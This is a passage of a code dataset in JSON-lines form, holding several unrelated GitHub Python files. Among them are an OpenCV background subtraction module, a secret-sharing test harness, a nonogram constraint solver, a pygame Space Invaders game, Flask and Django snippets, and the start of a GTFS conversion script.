Post.pets.through.objects.bulk_create(post_pets)\n","repo_name":"PolinaZi/pet_sitting_django","sub_path":"web/management/commands/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27951794083","text":"import os\n\nimport cv2 as cv\nimport numpy as np\n\nfrom cv.utils.fileHandler import createOutFolder\n\n\ndef opencvBGSubMOG2(video: cv.VideoCapture, videoId: int, fps: int = 30, genNewCache: bool = False,\n **kwargs) -> cv.VideoCapture:\n cached_video, cacheName, cachePath = loadCache(\"MOG2\", videoId, genNewCache, kwargs)\n if cached_video is not None:\n return cached_video\n\n backsub = cv.createBackgroundSubtractorMOG2(\n kwargs.get('history', None),\n kwargs.get('varThreshold', 16),\n kwargs.get('detectShadows', False)\n )\n\n masks = []\n video.set(cv.CAP_PROP_POS_FRAMES, 0)\n kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (kwargs.get(\"kernelSize\", 5), kwargs.get(\"kernelSize\", 5)))\n while video.isOpened():\n ret, frame = video.read()\n if not ret:\n break\n\n fgMask = backsub.apply(frame, learningRate=kwargs.get('learningRate', -1))\n\n fgMask = cv.morphologyEx(fgMask, cv.MORPH_OPEN, kernel)\n\n # Prepare the image for matching\n if kwargs.get('prepareMatching', False):\n prepareMatching(fgMask)\n\n # remove shadows (all gray to black)\n fgMask[fgMask == 127] = 255\n\n masks.append(cv.cvtColor(fgMask, cv.COLOR_GRAY2BGR))\n\n if kwargs.get('display', False) and not showVideoFrameWithMask(frame, fgMask, fps):\n break\n\n # saves video file\n createCache(cacheName, cachePath, masks, videoId)\n\n # load video to return\n video = cv.VideoCapture(cachePath)\n return video\n\n\ndef createCache(cacheName, cachePath, data, videoId):\n createOutFolder('cache')\n createOutFolder(f'cache/{videoId}')\n if os.path.isfile(cachePath):\n print(\"Overwriting Cache with name: \" + cacheName, end=\"\")\n os.remove(cachePath)\n else:\n print(\"Creating Cache with name: \" + cacheName, end=\"\")\n # Create video\n writer = cv.VideoWriter(cachePath, cv.VideoWriter_fourcc(*'FFV1'), 30, (data[0].shape[1], data[0].shape[0]))\n ten_th = len(data) // 10\n for i, mask in enumerate(data):\n writer.write(mask)\n if i % ten_th == 0:\n print(\"-\", end=\"\")\n writer.release()\n if not os.path.isfile(cachePath):\n raise Exception(\"Cache file could not be created at Path: \" + cachePath)\n print(\"> Done\")\n\n\n# returns video\ndef opencvBGSubKNN(video: cv.VideoCapture, videoId: int, fps: int = 30, genNewCache: bool = False,\n **kwargs) -> cv.VideoCapture:\n cached_video, cacheName, cachePath = loadCache(\"KNN\", videoId, genNewCache, kwargs)\n if cached_video is not None:\n return cached_video\n\n backsub = cv.createBackgroundSubtractorKNN(\n kwargs.get('history', None),\n kwargs.get('dist2Threshold', 400),\n kwargs.get('detectShadows', False)\n )\n\n masks = []\n video.set(cv.CAP_PROP_POS_FRAMES, 0)\n kernel_open = cv.getStructuringElement(cv.MORPH_ELLIPSE,\n (kwargs.get(\"kernelSize_open\", 5), kwargs.get(\"kernelSize_open\", 5)))\n kernel_close = cv.getStructuringElement(cv.MORPH_ELLIPSE,\n (kwargs.get(\"kernelSize_close\", 5), kwargs.get(\"kernelSize_close\", 5)))\n while video.isOpened():\n ret, frame = video.read()\n if not ret:\n break\n\n fgMask = backsub.apply(frame, learningRate=kwargs.get('learningRate', -1))\n\n fgMask = cv.morphologyEx(fgMask, cv.MORPH_OPEN, kernel_open)\n fgMask = cv.morphologyEx(fgMask, cv.MORPH_CLOSE, kernel_close)\n\n # Prepare the image for matching\n if kwargs.get('prepareMatching', False):\n prepareMatching(fgMask)\n\n # cv.imshow(\"fgMask\", fgMask)\n # cv.waitKey(25)\n\n masks.append(cv.cvtColor(fgMask, cv.COLOR_GRAY2BGR))\n if kwargs.get('display', False) and not showVideoFrameWithMask(frame, fgMask, fps):\n break\n\n # saves video file\n createCache(cacheName, cachePath, masks, videoId)\n\n # load video to return\n video = cv.VideoCapture(cachePath)\n return video\n\n\ndef loadCache(func_name: str, videoId: int, genNewCache: bool, kwargs: dict):\n kwargs.pop('display', None)\n kwargs.pop('genNewCache', None)\n kwargs_str = str(kwargs).replace(\" \", \"_\").replace(\":\", \"_\").replace(\",\", \"_\").replace(\"=\", \"_\").replace(\"{\", \"_\") \\\n .replace(\"}\", \"_\").replace(\"'\", \"\").replace(\"_\", \"\")\n cacheName = f'{func_name}__{kwargs_str}.avi'\n cachePath = os.path.join(f'out/cache/{videoId}/{cacheName}')\n if not genNewCache:\n # checks if file exists name is based on the parameters\n if os.path.isfile(cachePath):\n # loads video file and returns it\n video = cv.VideoCapture(cachePath)\n return video, cacheName, cachePath\n else:\n print(\"Cache file not found at Path: \" + cachePath)\n\n return None, cacheName, cachePath\n\n\ndef ownBGSubMedian(video: cv.VideoCapture, videoId: int, fps: int = 30, genNewCache: bool = False,\n **kwargs) -> cv.VideoCapture:\n cached_video, cacheName, cachePath = loadCache(\"Median\", videoId, genNewCache, kwargs)\n if cached_video is not None:\n return cached_video\n\n frames = []\n video.set(cv.CAP_PROP_POS_FRAMES, 0)\n for _ in range(kwargs.get('n', 10)):\n ret, frame = video.read()\n if not ret:\n break\n frames.append(frame)\n median = np.median(frames, axis=0).astype(np.uint8)\n\n masks = []\n video.set(cv.CAP_PROP_POS_FRAMES, kwargs.get('n', 10))\n while video.isOpened():\n ret, frame = video.read()\n if not ret:\n break\n\n # Subtract the median from the current frame\n fgMask = cv.absdiff(frame, median)\n\n # Conversion to 2 bit image\n fgMask = cv.cvtColor(fgMask, cv.COLOR_BGR2GRAY)\n fgMask = cv.threshold(fgMask, kwargs.get('thresholdMin', 50),\n kwargs.get('thresholdMax', 255), cv.THRESH_BINARY)[1]\n\n # closing with circles\n fgMask = cv.morphologyEx(fgMask, cv.MORPH_CLOSE, cv.getStructuringElement(cv.MORPH_ELLIPSE, (5, 5)))\n\n # Prepare the image for matching\n if kwargs.get('prepareMatching', False):\n prepareMatching(fgMask)\n\n masks.append(fgMask)\n\n if kwargs.get('display', False) and not showVideoFrameWithMask(frame, fgMask, fps):\n break\n\n # saves video file\n createCache(cacheName, cachePath, masks, videoId)\n\n # load video to return\n video = cv.VideoCapture(cachePath)\n return video\n\n\ndef showVideoFrameWithMask(frame: np.ndarray, mask: np.ndarray, fps: int = 30):\n \"\"\" Shows the frame and the mask in two windows\n\n :param frame: The frame to show\n :param mask: The mask to show\n :param fps: The fps of the video\n \"\"\"\n\n cv.imshow(\"Frame\", frame)\n cv.imshow(\"FG Mask\", mask)\n\n keyboard = cv.waitKey(1000 // fps)\n if keyboard == 27 or (keyboard == 32 and cv.waitKey(0) == 27):\n return False\n return True\n\n\ndef prepareMatching(fgMask: np.ndarray):\n \"\"\" Prepares the image for matching\n It changes 0 to 1 and 255 to 254\n\n :param fgMask: The image to prepare\n \"\"\"\n fgMask[(fgMask == 0)] = 1\n fgMask[(fgMask == 255)] = 254\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"DeeDz-x/ComputerVision22-23","sub_path":"cv/processing/bgsubtraction.py","file_name":"bgsubtraction.py","file_ext":"py","file_size_in_byte":7267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35941543375","text":"import pandas as pd\nimport yaml\nimport random\nfrom setup import *\nfrom share import share\nfrom reconstruct import reconstruct\nfrom reconstruction_tools import dict_to_list\nfrom determinant import *\nfrom function_tools import print_function\nfrom renew import renew\nfrom reset import reset\nfrom add import add\nfrom add_tools import merge_data\nfrom path import get_data_path\nfrom linear import create_shares_for_messages\nfrom multiply import multiply\n\n# random.seed(42)\n\n# path to DATA directory\ndata_path = get_data_path()\n\nprime = 997\nprint_statements = False\n\n\n# main testframe\n# tests all given examples in 'tassa_setups.yaml' for setup, share, reconstruct, add, renew, reset, multiply\n# (implicitly also pre_mult and linear)\ndef main():\n print(\"\\n\" * 10)\n\n with open(\"tassa_setups.yaml\", 'r') as stream:\n try:\n docs = yaml.load_all(stream)\n except yaml.YAMLError as exc:\n print(exc)\n sys.exit(1)\n for doc in docs:\n thresholds = doc['thresholds']\n people = doc['people']\n name = doc['name']\n disjunctive_name = \"{}_dis\".format(name)\n for setup_name in [name, disjunctive_name]:\n print(\"Name: {}\\nPeople per level: {}\\nThresholds: {}\".format(setup_name, people, thresholds))\n print(\"Field size is {}\".format(prime))\n levels = merge_data(people, thresholds)\n random_message = random.randint(0, prime - 1)\n print(\"Generated message is {}\".format(random_message))\n # setup\n test_setup(levels, setup_name)\n # share\n original_function, original_shares = test_share(random_message, setup_name)\n # reconstruct\n original_determinant, other_determinants = test_reconstruct(original_function, original_shares,\n random_message, setup_name, thresholds)\n # renew\n test_renew(random_message, setup_name)\n # reset\n old_shares = test_reset(levels, original_determinant, other_determinants, setup_name)\n # add\n test_add(old_shares, original_function, random_message, setup_name)\n # multiply\n test_multiply(setup_name)\n print(\"~\" * 100)\n print(\"Operation successfully accomplished.\")\n\n\ndef test_multiply(setup_name):\n shares_of_messages_for_multiply, _, _ = create_shares_for_messages(setup_name, np.random.randint(0, prime-1),\n np.random.randint(0, prime-1))\n print(\"\\nCalling multiply('{}', {})\".format(setup_name, shares_of_messages_for_multiply))\n shares = multiply(setup_name, shares_of_messages_for_multiply, print_statements=print_statements)\n print(\"Multiply successful. Computed messages: {}\".format(shares))\n\n\ndef test_add(old_shares, original_function, random_message, setup_name):\n # get all possible shareholder IDs to be added\n max_options = get_options_for_add(old_shares)\n # call add on each of those options\n for option in max_options:\n print(\"\\nCalling add('{}', {}, {}\".format(setup_name, old_shares, option))\n add_shares, add_result = add(setup_name, old_shares, option, print_statements=print_statements,\n function_f=original_function)\n if add_shares == add_result == -1:\n print(\"add could not be tested due to overflow in linear reconstruction\\n\\n\\n\")\n else:\n print(\"New shares after add {} are:\".format(option))\n for each_share in add_shares:\n print(each_share, \":\", add_shares[each_share])\n if add_result == random_message:\n print(\"Shareholders reconstruct to message {}, add successful.\".format(add_result))\n\n\n# get all options for IDs that can be added\n# e.g in a setup where (1,0) and (2,1) exist, possible options would be\n# (3,0) or (3,1) -> Max person ID + 1 in all already existing levels\ndef get_options_for_add(old_shares):\n max_options = []\n j_s = []\n used = []\n share_list = dict_to_list(old_shares)\n for item in share_list:\n j_value = item[0].split('_')\n j_value = j_value[2]\n j_s.append(j_value)\n # search for all levels where we can add a person\n for idx, j in enumerate(j_s):\n try:\n if not j_s[idx] == j_s[idx + 1]:\n max_options.append(share_list[idx][0])\n used.append(j)\n except IndexError:\n if not j_s[idx] in used:\n max_options.append(share_list[idx][0])\n used.append(j)\n # save all options as a list\n max_options = [(int(item.split('_')[1]) + 1, int(item.split('_')[2])) for item in max_options]\n return max_options\n\n\ndef test_reset(levels, original_determinant, other_determinants, setup_name):\n other_determinants.insert(0, original_determinant)\n old_shares = old_shares_to_dict(setup_name)\n new_structure2 = create_new_level_structure(levels, levels[-1][0] + 3, levels[-1][1] + 3, 1)\n print(\"\\nCalling reset('{}', {}, new_shares={}):\".format(setup_name, old_shares, new_structure2))\n shares = reset(setup_name, old_shares, new_shares=new_structure2, print_statements=print_statements)\n print(\"New shares after reset are:\")\n for each_share in shares:\n print(each_share, \":\", shares[each_share])\n print(\"Reset successful.\")\n return old_shares\n\n\n# create a new level structure to reset the setup on\ndef create_new_level_structure(levels, people_in_last_level, threshold_in_last_level, structure):\n new_structure = levels.copy()\n new_structure[-1] = ([people_in_last_level, threshold_in_last_level])\n new_structure2 = levels.copy()\n new_structure2.append([1, levels[-1][1] + 1])\n if structure is 1:\n return new_structure\n else:\n return new_structure2\n\n\ndef test_renew(random_message, setup_name):\n print(\"\\nCalling renew('{}', {}):\"\n .format(setup_name, \"{'shares': 'all'}\"))\n resulting_shares, renew_result = renew(setup_name, {'shares': 'all'}, print_statements=print_statements)\n print(\"Resulting shares after renew are:\")\n for each_share in resulting_shares:\n print(\"{} : {}\".format(each_share, resulting_shares[each_share]))\n if renew_result == random_message:\n print(\"New Result ({}) is the same as the original message, renew successful.\".format(renew_result))\n else:\n print(\"WTF?! {} != {} (in renew)\".format(renew_result, random_message))\n\n\ndef test_reconstruct(original_function, original_shares, random_message, setup_name, thresholds):\n print(\"\\nCalling reconstruct('{}', number_of_people={}, \"\n \"random_subset=True, subset={{}}, print_statements=False):\"\n .format(setup_name, thresholds[-1]))\n try:\n secret, resulting_function, original_determinant, other_determinants, matrix \\\n = reconstruct(setup_name, thresholds[-1], print_statements=print_statements)\n except TypeError as e:\n print(\"Could not reconstruct to a valid integer-result (test_setups): {}\".format(e))\n sys.exit(1)\n if not secret == random_message:\n print(\"Reconstruction in setup {} calculated an incorrect result (should be {} but was {})\"\n .format(setup_name, random_message, secret))\n sys.exit(1)\n else:\n print(\"The reconstructed function is\\t{}, the message is\\t{}\\n\\t\"\n \"(Original function was\\t{} with secret\\t{})\"\n .format(print_function(resulting_function, printed=False), secret,\n print_function(original_function, printed=False), random_message))\n print(\"\\nOriginal shares were:\")\n for each_share in original_shares:\n print(each_share, \":\", original_shares[each_share])\n return original_determinant, other_determinants\n\n\ndef test_share(random_message, setup_name):\n print(\"\\nCalling share('{}', {}, prime_number={}, print_statements=False):\"\n .format(setup_name, random_message, prime))\n original_function, original_shares = share(setup_name, random_message, field_size=prime,\n print_statements=print_statements)\n return original_function, original_shares\n\n\ndef test_setup(levels, setup_name):\n delete_setup(setup_name)\n print(\"\\nCalling setup('{}', {}):\".format(setup_name, levels))\n setup(setup_name, levels, field_size=prime)\n\n\ndef old_shares_to_dict(name):\n all_shares = {}\n shares_path = os.path.join(data_path, name, 'shares.csv')\n shares = pd.read_csv(shares_path, skiprows=0, header=0, delimiter=',', )\n tuples = [tuple(x) for x in shares.values]\n for (x, y) in tuples:\n all_shares[x] = y\n print(all_shares)\n return all_shares\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"PaulMoritz/Secret-Sharing-in-Comparison","sub_path":"code_tested/code/hss/test_setups.py","file_name":"test_setups.py","file_ext":"py","file_size_in_byte":8937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37380989146","text":"import copy\nimport queue\n\n###############################################################\n###############################################################\n\n\ndef read_input():\n global width, height, dr, dc\n fin = open(\"zad_input.txt\", 'r')\n line = fin.readline()[:-1]\n xy = line.split(\" \")\n height = int(xy[0])\n width = int(xy[1])\n sdr = []\n for i in range(height):\n line = fin.readline()[:-1]\n ts = line.split(\" \")\n ti = []\n for c in ts:\n ti.append(int(c))\n sdr.append(tuple(ti))\n dr = tuple(sdr)\n sdc = []\n for i in range(width):\n line = fin.readline()[:-1]\n ts = line.split(\" \")\n ti = []\n for c in ts:\n ti.append(int(c))\n sdc.append(tuple(ti))\n dc = tuple(sdc)\n fin.close()\n return width, height, dr, dc\n\n\ndef write_output(tab):\n fout = open(\"zad_output.txt\", 'w')\n for t in tab:\n for i in t:\n if i:\n fout.write(znak[1])\n else:\n fout.write(znak[0])\n fout.write(\"\\n\")\n print(\"euuuuuuuuuurekaaaaaaaaaaa!!!\")\n fout.close()\n exit()\n\n\ndef no_solution():\n print(\"przegraliśmy :'(\")\n exit()\n\n\ndef printtab(tab):\n for t in tab:\n for i in t:\n if i:\n print(znak[1], end=\"\")\n else:\n print(znak[0], end=\"\")\n print()\n print()\n\n\ndef printline(line):\n for i in line:\n if i:\n print(znak[1], end=\"\")\n else:\n print(znak[0], end=\"\")\n print()\n\n\n########################################################################################################################\n########################################################################################################################\n\ndef next_fit(t, length, fir, d):\n n = len(d)-1\n if fir[n] + d[n] == length:\n n -= 1\n while n >= 0 and t[fir[n] + d[n] + 1]:\n n -= 1\n if n < 0:\n return True, t, fir\n t[fir[n]] = False\n t[fir[n] + d[n]] = True\n fir[n] += 1\n for i in range(n + 1, len(d)):\n fir[i] = fir[i-1] + d[i-1] + 1\n for j in range(fir[i], fir[i] + d[i]):\n t[j] = True\n t[fir[i] - 1] = False\n if fir[i] + d[i] < length:\n t[fir[i] + d[i]] = False\n for j in range(fir[len(d)-1] + d[len(d)-1], length):\n t[j] = False\n else:\n t[fir[n]] = False\n t[fir[n] + d[n]] = True\n fir[n] += 1\n return False, t, fir\n\n\ndef all_fits(d, length):\n t = []\n fir = []\n for k in d: # k = długość bloku\n fir.append(len(t))\n for i in range(k):\n t.append(True)\n t.append(False)\n t = t[:-1]\n if len(t) > length:\n return False\n for i in range(len(t), length):\n t.append(False)\n possibles = [t]\n possible_starts = [fir]\n while True:\n koniec, t, fir = next_fit(copy.deepcopy(t), length, copy.deepcopy(fir), d)\n if koniec:\n break\n possibles.append(t)\n possible_starts.append(fir)\n\n return possibles\n\n\ndef revise_one(possibles, length, fix1):\n if len(possibles) == 0:\n no_solution()\n elif len(possibles) == 1:\n fix1 = [True for _ in range(length)]\n else:\n for i in range(length):\n if not fix1[i]:\n fix1[i] = True\n for p in possibles:\n if p[i] != possibles[0][i]:\n fix1[i] = False\n break\n return fix1\n\n\ndef revise_two(a, b, wzor, dom, fix, length):\n revised = False\n k = []\n for p in dom[b]:\n if p[a] == wzor:\n k.append(p)\n else:\n revised = True\n dom[b] = k\n if revised:\n fix[b] = revise_one(dom[b], length, fix[b])\n if not fix[b][a]:\n print(\"dalej niedziałaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!!!!!!!!!!!!!!\")\n exit()\n return revised\n # wyrzuć z dziedziny wszystkie dopasowania, które nie mają danego piksela we właściwym ustawieniu\n # ustaw piksel jako fixed\n\n\ndef queue_init():\n que = queue.Queue()\n for r in range(height):\n for c in range(width):\n que.put((r, c, True))\n que.put((r, c, False))\n return que # dodaj wszystkie piksele na kolejkę\n\n\ndef possibles_init(d, siz1, siz2):\n pss = []\n for i in range(siz1):\n pss.append(all_fits(d[i], siz2))\n return pss\n\n\ndef fixed_init(pss, siz1, siz2):\n fix = []\n for i in range(siz1):\n fix.append(revise_one(pss[i], siz2, [False for _ in range(siz2)]))\n return fix\n\n\ndef ac3():\n que = queue_init() # (row, col, r/c)\n possibles_rows = possibles_init(dr, height, width)\n possibles_cols = possibles_init(dc, width, height)\n fixed_r = fixed_init(possibles_rows, height, width)\n fixed_c = fixed_init(possibles_cols, width, height)\n while not que.empty():\n x = que.get() # (row, col, r/c)\n\n if x[2] and fixed_r[x[0]][x[1]]: # and not fixed_c[x[1]][x[0]]:\n # print(\"row -> col\", x)\n if revise_two(x[0], x[1], possibles_rows[x[0]][0][x[1]], possibles_cols, fixed_c, height):\n for i in range(height):\n que.put((i, x[1], False))\n\n if (not x[2]) and fixed_c[x[1]][x[0]]: # and not fixed_r[x[0]][x[1]]:\n # print(\"col -> row\", x)\n if revise_two(x[1], x[0], possibles_cols[x[1]][0][x[0]], possibles_rows, fixed_r, width):\n for i in range(width):\n que.put((x[0], i, True))\n\n for i in range(height):\n for j in range(width):\n if fixed_r[i][j] != fixed_c[j][i]:\n print(\"fixed się źle ustawiają\", i, j)\n\n finish_check(possibles_rows)\n\n\ndef finish_check(possibles_rows):\n koniec = True\n for r in possibles_rows:\n if len(r) > 1:\n koniec = False\n break\n if koniec:\n t = []\n for r in possibles_rows:\n t.append(r[0])\n write_output(t)\n\n########################################################################################################################\n\n\nglobal width, height, dr, dc\nznak = (\".\", \"#\")\n\nread_input()\nac3()\nprint(\"przegraliśmy :'(\")\n","repo_name":"WeronikaTarnawska/pracownie-ai","sub_path":"3_1_obrazki.py","file_name":"3_1_obrazki.py","file_ext":"py","file_size_in_byte":6300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34743234398","text":"import pygame\nimport random\nfrom settings import *\nfrom sprites import Player, Enemy, Missile, Block, Explosion\n# in terminal -> pip install pygame\n\nSIZE = (DISPLAY_WIDTH, DISPLAY_HEIGHT)\nFPS = 60\n\n##########################################################################\n\npygame.init()\n\n\ndef start_screen():\n screen = pygame.display.set_mode(SIZE)\n pygame.display.set_caption(\"Space Invaders\")\n\n clock = pygame.time.Clock()\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n running = False\n\n screen.fill(BLACK)\n pygame.display.flip()\n\n clock.tick(FPS)\n\n\ndef game_over():\n screen = pygame.display.set_mode(SIZE)\n pygame.display.set_caption(\"Space Invaders\")\n\n clock = pygame.time.Clock()\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n return False\n if event.key == pygame.K_RETURN:\n return True\n\n screen.fill(BLACK)\n pygame.display.flip()\n\n clock.tick(FPS)\n\n\ndef play():\n\n screen = pygame.display.set_mode(SIZE)\n pygame.display.set_caption(\"Space Invaders\")\n\n # sounds\n fire_sound = pygame.mixer.Sound(\"Assets/shoot.wav\")\n enemy_kill = pygame.mixer.Sound(\"Assets/invaderkilled.wav\")\n\n # score\n score = 0\n score_object = SM_FONT.render(f\"Score: {score}\", True, WHITE)\n score_rect = score_object.get_rect()\n score_rect.center = 100, 20\n\n # sprite groups\n player_group = pygame.sprite.Group() # create sprite group for player\n enemy_group = pygame.sprite.Group()\n all_sprites = pygame.sprite.Group() # group for all sprites\n missile_group = pygame.sprite.Group()\n block_group = pygame.sprite.Group()\n explosion_group = pygame.sprite.Group()\n\n # Player\n player = Player(\"Assets/player.png\") # create player object\n player_group.add(player) # add player to group\n all_sprites.add(player)\n\n # Enemy\n offset_x = 30\n offset_y = 100\n v_scale = DISPLAY_HEIGHT // 18\n h_scale = DISPLAY_WIDTH // 12\n for row in range(5):\n if row == 1:\n enemy_img = RED_ALIEN\n elif 1 < row < 4: enemy_img = GREEN_ALIEN\n else:\n enemy_img = YELLOW_ALIEN\n for col in range(11):\n x_pos = col*h_scale + offset_x\n y_pos = row*v_scale + offset_y\n enemy = Enemy(enemy_img, x_pos, y_pos)\n enemy_group.add(enemy)\n\n # create shields\n start_values = [75, 200, 325, 450]\n for start in start_values:\n for row_index, row in enumerate(SHEILD):\n # print(row_index, row)\n for col_index, col in enumerate(row):\n if col == 'x':\n x_pos = col_index*BLOCK_WIDTH + start\n y_pos = row_index*BLOCK_HEIGHT + 500\n block = Block(screen, x_pos, y_pos)\n block_group.add(block)\n all_sprites.add(block)\n\n clock = pygame.time.Clock()\n enemy_direction = 1\n\n running = True\n playing = 10000\n\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n missile = Missile(player.rect.centerx - MISSILE_WIDTH//2,\n player.rect.top)\n missile_group.add(missile)\n all_sprites.add(missile)\n fire_sound.play()\n\n # hit detection\n enemy_death = pygame.sprite.groupcollide(missile_group, enemy_group, True, True)\n if enemy_death:\n enemy_kill.play()\n score += 10\n for hit in enemy_death:\n explosion = Explosion(hit.rect.center)\n explosion_group.add(explosion)\n all_sprites.add(explosion)\n\n playing -= 1000\n if playing == 0:\n running = False\n\n # game logic\n\n enemies = enemy_group.sprites()\n # rand_enemy = random.choice(enemies)\n\n # bomb = Bomb(rand_enemy.rect.centerx, rand_enemy.rect.bottom)\n\n for enemy in enemies:\n if enemy.rect.right >= DISPLAY_WIDTH:\n enemy_direction = -1\n\n if enemies:\n for alien in enemies:\n alien.rect.y += 2\n\n elif enemy.rect.x <= 0:\n enemy_direction = 1\n\n if enemies:\n for alien in enemies:\n alien.rect.y += 2\n\n screen.fill(BLACK)\n\n # sprite groups\n missile_group.draw(screen)\n player_group.draw(screen)\n enemy_group.draw(screen)\n block_group.draw(screen)\n explosion_group.draw(screen)\n\n enemy_group.update(enemy_direction)\n all_sprites.update()\n\n # text\n score_object = SM_FONT.render(f\"Score: {score}\", True, WHITE)\n screen.blit(score_object, score_rect)\n\n pygame.display.flip()\n\n clock.tick(FPS)\n\n\nstart_screen()\nplaying = True\nwhile True:\n play()\n playing = game_over()\n\npygame.quit()\n","repo_name":"CameronChadwick/spriteIntro","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30077929738","text":"\"\"\"\nThis module implements response for search requests\n\"\"\"\nfrom urllib.parse import parse_qs\nimport src.service.database_queries as service\nfrom flask_restful import Resource\nfrom src.rest.resources.wrappers import check_authorisation\nfrom src.schemas.employee import EmployeeSchema\nfrom datetime import date\n\nclass SearchEmployeeApi(Resource):\n \"\"\"\n Class for search restfull resource\n \"\"\"\n employee_schema = EmployeeSchema()\n\n @check_authorisation\n def get(self, search_query):\n \"\"\"\n get method for search request\n :param search_query: search query with parameters\n :return: employees data in json, if such employees exists\n \"\"\"\n params = parse_qs(search_query)\n if \"email\" in params.keys():\n employee = service.get_employee_by_email(params[\"email\"][0])\n return self.employee_schema.dump(employee), 200\n department_id = int(params[\"department\"][0]) if params.get(\"department\") else False\n name = params[\"name\"][0] if params.get(\"name\") else False\n start_date = params[\"start_date\"][0] if params.get(\"start_date\") else False\n end_date = params[\"end_date\"][0] if params.get(\"end_date\") else False\n employees = service.search_employees(name, department_id, start_date, end_date)\n return self.employee_schema.dump(employees, many=True), 200\n","repo_name":"akopika/epam_project","sub_path":"src/rest/resources/search_employee.py","file_name":"search_employee.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24811681696","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('',views.lockhome,name='lockhome'),\n path('login/',views.login,name='login'),\n path('sign/',views.sign,name='sign'),\n path('logout/',views.logout,name='logout'),\n path('joboffers/',views.post_a_job,name='post_a_job'),\n path('profile/',views.profile,name='profile'),\n]","repo_name":"hemant-17/algorithm6.0","sub_path":"lock/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32336200807","text":"a = \"Winter Is Coming!\"\nstr_2 = ''\nfor letter in a:\n\tif letter.isupper():\n\t\tstr_2 = str_2 + letter.lower()\n\telif letter.islower():\n\t\tstr_2 = str_2 + letter.upper()\n\telse:\n\t\tprint(letter)\nprint (str_2)","repo_name":"anusha2398/Python-Projects","sub_path":"prog4.py","file_name":"prog4.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72476177762","text":"import pygame\nfrom config.conf import SCREEN_WIDTH, SCREEN_HEIGHT, FPS\nfrom game.game import Game\n\n\ndef main():\n pygame.init()\n pygame.mixer.init()\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n pygame.display.set_caption(\"Soul Hunter\")\n clock = pygame.time.Clock()\n\n game = Game(screen)\n\n while True:\n game.get_events()\n game.update_screen()\n game.update_music()\n pygame.display.update()\n clock.tick(FPS)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SaeedAlian/soulhunter_game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37172489945","text":"import flet as ft\n\n\ndef main(page: ft.Page):\n def on_column_scroll(e: ft.OnScrollEvent):\n print(\n f\"Type: {e.event_type}, pixels: {e.pixels}, min_scroll_extent: {e.min_scroll_extent}, max_scroll_extent: {e.max_scroll_extent}\"\n )\n\n cl = ft.Column(\n spacing=10,\n height=200,\n width=200,\n scroll=ft.ScrollMode.ALWAYS,\n on_scroll=on_column_scroll,\n )\n for i in range(0, 50):\n cl.controls.append(ft.Text(f\"Text line {i}\", key=str(i)))\n\n page.add(\n ft.Container(cl, border=ft.border.all(1)),\n )\n\n\nft.app(main)\n","repo_name":"flet-dev/examples","sub_path":"python/controls/column/scroll-events.py","file_name":"scroll-events.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":296,"dataset":"github-code","pt":"54"} +{"seq_id":"72954071522","text":"from string import digits\nimport os\n\n#TODO: Check 'UP'\n\nTRANSLATION = {'00': 'MA-PE', '25': 'MA-TO', '13': 'MA', '14': 'TI', '11': 'KE', '03': 'TO', '04': 'PE', '05': 'LA', '06': 'SU', 'UP': 'UP'}\nWEEKDAY_TRANSLATION = {'00': [1,1,1,1,1,0,0], '25': [1,1,1,1,0,0,0], '13': [1,0,0,0,0,0,0], '14': [0,1,0,0,0,0,0], '11': [0,0,1,0,0,0,0], '03': [0,0,0,1,0,0,0], '04': [0,0,0,0,1,0,0], '05': [0,0,0,0,0,1,0], '06': [0,0,0,0,0,0,1], 'UP': [0,0,0,0,0,0,0]}\n\ndigit_trans = str.maketrans('a','a',digits)\n\ncurrent_route = ''\ncalendar = ''\nroute = ''\ntrip_id = ''\nvalid = False\nsidx = 1\n\ncalendars = []\ncalendar_objs = {}\nroutes = []\ntrips = []\ntrip_objs = {}\nstoptimes = []\nany_stops = False\n\nstops = set([])\nmissing_stops = set([])\n\nfor stop in open('gtfs/stops.txt'):\n stops.add(stop.split(',')[0])\n\nheadsigns = {}\nfor route in open('./routes.csv'):\n headsigns[route.split(',')[0]] = route.split(',')[1].strip()\n\ndef getCalendar(sched_type, start, end):\n calendar = TRANSLATION[sched_type] + '_' + start + '_' + end\n weekdays = WEEKDAY_TRANSLATION[sched_type]\n if end == '':\n end = '20160619'\n if start == '':\n start = '20150810'\n return {'service_id': calendar, 'monday': weekdays[0], 'tuesday': weekdays[1], 'wednesday': 